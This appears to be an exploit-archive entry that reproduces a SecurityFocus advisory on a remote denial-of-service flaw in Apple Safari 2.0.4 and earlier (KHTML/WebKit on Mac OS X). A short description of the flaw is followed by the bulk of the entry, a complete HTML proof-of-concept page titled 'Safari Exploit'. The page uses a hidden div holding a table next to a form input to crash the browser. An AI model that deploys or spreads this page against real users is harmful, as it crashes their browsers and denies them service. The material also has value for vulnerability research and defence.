Apple Safari <= 2.0.4 KHTML WebKit Remote Denial of Service Vulnerability



source: http://www.securityfocus.com/bid/27261/info


Apple Safari is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

Apple Safari 2 running on Mac OS X is vulnerable. 

<html>
<head>
<title>Safari Exploit</title>
</head>
<body>

<form>
<div id="foo" style="display:none;">
<table>
<tr>
<td></td>
</tr>
</table>
</div>
<input type="text" />
</form>
</body>
</html>